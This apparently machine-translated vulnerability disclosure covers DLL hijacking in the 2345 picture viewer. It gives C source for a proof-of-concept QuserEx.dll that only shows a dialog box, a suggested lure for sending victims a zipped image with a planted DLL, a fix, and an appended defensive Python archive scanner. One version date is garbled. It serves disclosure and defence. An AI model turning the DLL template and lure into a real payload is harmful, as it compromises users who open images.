Remote Code Execution Vulnerability in 2345 view tuwang (with vulnerability PoC)
A remote code execution vulnerability in 2345 view tuwang.
(Young man, I think you are surprised by the bones. This amazing photo is for you for free)
Detailed description:
The 2345picviewer.exe process tries to load a QuserEx.dll file from the same directory as the image. If an image file and a malicious QuserEx.dll file are placed in the same directory, this can lead to remote code execution (for example, the two files are packaged and sent to the victim under an eye-catching title, and the victim is compromised after unzipping the package).
Proof of vulnerability:
First, download the latest version of 2345 view tuwang. The latest version on the official website is April 9, August 27, 2015, as shown below:
Now we need to compile a QuserEx.dll file. The code is as follows (a dialog box is displayed to prove that the DLL can be loaded):
    #include <windows.h>

    /* Proof-of-concept DLL: shows a dialog box when it is loaded into a process. */
    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
    {
        switch (fdwReason) {
        case DLL_PROCESS_ATTACH:
            /* Runs once, when the DLL is mapped into the process. */
            MessageBoxA(NULL, "DLL hijacking vulnerability detected.", "2345", MB_ICONWARNING);
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
        case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
    }
After compilation, rename the output to quserex.dll. Then find an image, for example windows8.png. Put quserex.dll and windows8.png in the same folder, for example D:\Test.
After confirming that the file format is PNG, open the image. The DLL is loaded successfully, as shown in the following figure:
We can use Process Explorer to confirm that the DLL is loaded in the 2345picviewer.exe process, as shown in:
Proof complete!
Solution:
Call SetDllDirectory("") in the 2345picviewer.exe process. Passing an empty string removes the current directory from the DLL search path.
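Until the fix is deployed, a defender can screen incoming archives for the delivery pattern described above: a DLL packaged in the same folder as an image. The following is an added example, not part of the original write-up; the image extension list, the verdict labels and the sample archive contents are assumptions constructed for illustration.

```python
import io
import zipfile
from collections import defaultdict
from pathlib import PureWindowsPath

IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".bmp"}  # assumed viewer file types
KNOWN_HIJACK_NAMES = {"quserex.dll"}  # the DLL name from this write-up


def find_planted_dlls(archive):
    """Return sorted (dll_path, verdict) pairs for DLLs that share a folder with images."""
    folders = defaultdict(lambda: {"images": [], "dlls": []})
    with zipfile.ZipFile(archive) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # PureWindowsPath accepts both '/' and '\\' separators.
            path = PureWindowsPath(info.filename)
            folder = str(path.parent).lower()
            suffix = path.suffix.lower()
            if suffix in IMAGE_EXTS:
                folders[folder]["images"].append(info.filename)
            elif suffix == ".dll":
                folders[folder]["dlls"].append(info.filename)
    findings = []
    for entry in folders.values():
        if not entry["images"]:
            continue  # a DLL with no image beside it is outside this check
        for dll in entry["dlls"]:
            name = PureWindowsPath(dll).name.lower()
            verdict = "known-name" if name in KNOWN_HIJACK_NAMES else "dll-beside-image"
            findings.append((dll, verdict))
    return sorted(findings)


def build_sample_archive():
    """Constructed sample: a lure folder, a clean folder, a DLL-only folder, a mixed folder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("photos/windows8.png", b"\x89PNG\r\n\x1a\n")
        zf.writestr("photos/QuserEx.dll", b"MZ")
        zf.writestr("clean/holiday.jpg", b"\xff\xd8\xff")
        zf.writestr("tools/helper.dll", b"MZ")
        zf.writestr("mixed/cat.gif", b"GIF89a")
        zf.writestr("mixed/codec.dll", b"MZ")
    buf.seek(0)
    return buf
```

find_planted_dlls accepts a file path or a file-like object, so the same check can run on an attachment held in memory before anything is unpacked to disk.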